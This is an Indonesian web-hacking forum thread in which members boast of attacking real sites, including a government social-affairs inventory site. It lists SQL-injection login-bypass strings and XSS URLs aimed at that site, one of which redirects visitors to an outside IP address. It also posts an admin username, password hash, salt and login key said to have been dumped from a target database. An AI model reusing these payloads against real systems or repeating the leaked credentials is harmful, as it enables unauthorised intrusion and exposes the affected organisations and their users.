SQLI di depsos.go.id & PDAMbengkalis.co.id

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
User avatar
budysucks ykhc
Posts: 13
Joined: Mon Apr 26, 2010 6:15 am
Location: bekasi

Re: SQLI di depsos.go.id & PDAMbengkalis.co.id

Post by budysucks ykhc » Tue Apr 27, 2010 1:08 am

3xtr3m3b0y wrote:
budysucks ykhc wrote::devil :devil :devil :devil

SQL Injection 101, Login tricks :

admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

ada yg mo nambahin ???
Nah lho, masterx dah ngeluarin semua tuh... :kaca:
Btw gak usah repot2 dicatet or dihapalin, klo pke Firefox tinggal nginstall Add-On SQL Injection.
betul betul betul

mozzila love it :love:

tapi add-on hackbar mozilla gw kemana nich,... koq ilang ?!@#?
:gebrak:

User avatar
tey
Posts: 68
Joined: Tue May 01, 2007 11:30 am
Location: heaven

Re: SQLI di depsos.go.id & PDAMbengkalis.co.id

Post by tey » Tue Apr 27, 2010 6:47 pm

budysucks ykhc wrote::devil :devil :devil :devil

SQL Injection 101, Login tricks :

admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

ada yg mo nambahin ???

hohoho mantap jaya ..

ternyata gak cuman sqli aja yg ada disitu XSS jg ada :putusasa:

Code: Select all

http://inventori.depsos.go.id/manager/error_log.php?strErrorLog=%3Cscript%3Ewindow.location=%22http://203.217.29.175/Indonesia.html%22;%3C/script%3E

Code: Select all

http://inventori.depsos.go.id/manager/error_log.php?strErrorLog=%3Cscript%3Ealert%28%27Mobil%20Baru%20tapi%20Bukan%20Mobil%20Kantor%20=P%27%29%3C/script%3E
:mati:
i am not detractor person..like u :)
be a good boy..

User avatar
Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA
Contact:

Re: SQLI di depsos.go.id & PDAMbengkalis.co.id

Post by Digital Cat » Thu May 06, 2010 11:49 am

ada 91 tabel sama 60 kolom

Username=admin
password=6a29a21adae779e671f38145d5f3840f
salt=VfJQ4Pjc
loginkey=DgBjrZndvlasIRV5stnOzsd2e5C1aY8j8oThlUsjQ5FwEyfQMJ

lebih jelasnya liat aja di program aplikasi gw digital sqli tool yang nanti mau gw kasih tuk xcode-yogyafree and semua member disini cuman lg di uji coba dulu

:
Image

makasih

User avatar
ecko
Posts: 112
Joined: Sat Mar 17, 2007 9:18 pm
Location: CianjuR
Contact:

Re: SQLI di depsos.go.id & PDAMbengkalis.co.id

Post by ecko » Fri May 07, 2010 9:25 am

Wiiiiiiiiiiiiih,,,aq pengen tool nya itu om digital cat.

/me menunggu toolnya
:kaca: :kaca: :kaca:

User avatar
razor
Posts: 21
Joined: Thu Aug 02, 2007 3:18 pm
Contact:

Re: SQLI di depsos.go.id & PDAMbengkalis.co.id

Post by razor » Fri May 07, 2010 2:53 pm

:kaca: wiks... ane juga pengen nyoba toolsnya bro Digital Cat... cepet ya bro dilempar dimari... thanks :malumalu:
Image

User avatar
Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA
Contact:

Re: SQLI di depsos.go.id & PDAMbengkalis.co.id

Post by Digital Cat » Sat May 08, 2010 10:43 pm

@ecko ama razor :

sabar ya,toolny..
pasti gw post kok..

toolny lg di uji coba dulu
nich,ada error apa enggak
and sampai di mana kemampuannya..

tuk uji coba tool ini,
bentrok ama rutinis gw..
jd waktu luangnya dikit sempit..

harap bersabar ya..

makasih ;)

User avatar
budysucks ykhc
Posts: 13
Joined: Mon Apr 26, 2010 6:15 am
Location: bekasi

Re: SQLI di depsos.go.id & PDAMbengkalis.co.id

Post by budysucks ykhc » Mon May 10, 2010 3:27 am

tey wrote:
budysucks ykhc wrote::devil :devil :devil :devil

SQL Injection 101, Login tricks :

admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

ada yg mo nambahin ???

hohoho mantap jaya ..

ternyata gak cuman sqli aja yg ada disitu XSS jg ada :putusasa:

Code: Select all

http://inventori.depsos.go.id/manager/error_log.php?strErrorLog=%3Cscript%3Ewindow.location=%22http://203.217.29.175/Indonesia.html%22;%3C/script%3E

Code: Select all

http://inventori.depsos.go.id/manager/error_log.php?strErrorLog=%3Cscript%3Ealert%28%27Mobil%20Baru%20tapi%20Bukan%20Mobil%20Kantor%20=P%27%29%3C/script%3E
:mati:
:kaca: :licik:

Post Reply

Return to “Web Hacking”